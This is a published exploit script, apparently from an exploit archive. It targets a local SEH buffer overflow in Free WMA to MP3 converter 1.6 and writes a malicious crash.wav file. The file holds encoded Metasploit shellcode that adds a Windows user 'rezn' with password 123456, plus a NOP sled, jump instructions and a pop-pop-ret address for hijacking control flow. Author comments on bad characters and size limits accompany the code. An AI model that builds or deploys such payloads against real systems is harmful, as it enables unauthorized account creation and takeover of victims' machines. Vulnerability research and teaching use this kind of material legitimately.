Free WMA to MP3 converter 1.6 - Local buffer overflow [SEH]

#!/usr/bin/python -w
# In the name of allah
# Title : Local buffer overflow - SEH
# Infected program: [Free WMA to MP3 converter 1.6]
# Date: 30/11/2012
# Exploit Author: [R3ZN0V]
# Software : [www.eusing.com]
# Download Link: [http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm]
# OS's: [Windows xp sp3 , Windows 7 64bit sp1 and 32bit]
# References : http://www.exploit-db.com/exploits/15499/

#=====================================================================================#
# First , i'd like to thank b33f for all his cooperation (always the best man ;) ) .  #
# i suffered soo much until i made this a work exploit ,as well a few problems with   #   
# badchars analyzing and executing my shellcode , which is inside the memory after    #
# tracing badchars , if you looked deeply at the path you'll see a weird thing        #
# is a two byte of 0D will be added automatically like this :                         #
# 09 (0D) 0A 0B 0C (0D) , i've no idea what caused that,first 0D is the problem       #
# Probably like null-byte , however , go to metasploit and figure this out by badchars#
# analyzing , and see try to replace shell to another one using this command :        #
# msfencode -b '\x00\x0a' , obviously it won't work .                                 #
# 																					  #
# Another thing to mention very important , is the program doesn't allow shellcode    #
# over than 300b , try to feed the program shellcode more than 300b and see yourself. #
# And the badchars are \x0d\x0a .                                                     #
#=====================================================================================#

file = "crash.wav"

# windows/adduser EXITFUN=seh PASS=123456 USER=rezn R | msfencode -e x86/shikata_ga_nai -b '\x0a\x0d' -t c <========= 298 byte iteration=1 =========>
shell = ("\xda\xc1\xd9\x74\x24\xf4\xba\xd8\x8f\x4f\xc9\x5e\x2b\xc9\xb1"
"\x44\x83\xee\xfc\x31\x56\x16\x03\x56\x16\xe2\x2d\x73\xa7\x40"
"\xcd\x8c\x38\x33\x44\x69\x09\x61\x32\xf9\x38\xb5\x31\xaf\xb0"
"\x3e\x17\x44\x42\x32\xbf\x6b\xe3\xf9\x99\x42\xf4\xcf\x25\x08"
"\x36\x51\xd9\x53\x6b\xb1\xe0\x9b\x7e\xb0\x25\xc1\x71\xe0\xfe"
"\x8d\x20\x15\x8b\xd0\xf8\x14\x5b\x5f\x40\x6f\xde\xa0\x35\xc5"
"\xe1\xf0\xe6\x52\xa9\xe8\x8d\x3d\x09\x08\x41\x5e\x75\x43\xee"
"\x95\x0e\x52\x26\xe4\xef\x64\x06\xab\xce\x48\x8b\xb5\x17\x6e"
"\x74\xc0\x63\x8c\x09\xd3\xb0\xee\xd5\x56\x24\x48\x9d\xc1\x8c"
"\x68\x72\x97\x47\x66\x3f\xd3\x0f\x6b\xbe\x30\x24\x97\x4b\xb7"
"\xea\x11\x0f\x9c\x2e\x79\xcb\xbd\x77\x27\xba\xc2\x67\x8f\x63"
"\x67\xec\x22\x77\x11\xaf\x28\x86\x93\xca\x14\x88\xab\xd4\x36"
"\xe1\x9a\x5f\xd9\x76\x23\x8a\x9d\x87\xd2\x06\x08\x1f\x4d\xf3"
"\x71\x7d\x6e\x2e\xb5\x78\xed\xda\x46\x7f\xed\xaf\x43\x3b\xa9"
"\x5c\x3e\x54\x5c\x62\xed\x55\x75\x01\x7c\xce\x58\xa0\x06\x6b"
"\x85\x05\x94\x53\xab\x3c\x2e\xb4\x46\xcd\xab\xc6\x88\x43\x51"
"\x5d\xa7\x83\xa8\x93\x04\xf7\xff\xe5\x4a\xd8\xbe\x4d\xcf\x06"
"\x67\x68\xef\x28\x02\x00\xcf\xd8\xa3\x8b\x6e\x4c\x5b\x3e\x1e"
"\xf9\xd3\x9e\xa1\x65\x79\xb6\x4f\x0c\xf2\x3c\xe2\xaf\x80\xd3"
"\x70\x5c\x49\x5e\x10\xd8\xe7\xbe\xf5\x5d\xbc\xfa\x09")

evil = "\x90" * 30 + shell
junk1 = "\xEB\x06\x90\x90" # jmp 6 byte to far jmp 
junk2 = "\x56\x23\x40\x00" # pop pop retn Wmpcon.exe Rebase=false , aslr=false , seh=unsafe os=false
junk3 = "\xE9\xDF\xEF\xFF\xFF" # jmp back 4129 byte to the beggining of our buffer
junk4 = "C"*50
buffer = evil + "\x41"*(4116-len(evil)) + junk1 + junk2 + junk3 + junk4

text = open(file, "w")
text.write(buffer)
text.close()
print "\t\n The file has been created :) "

#  0day.today [2018-01-08]  #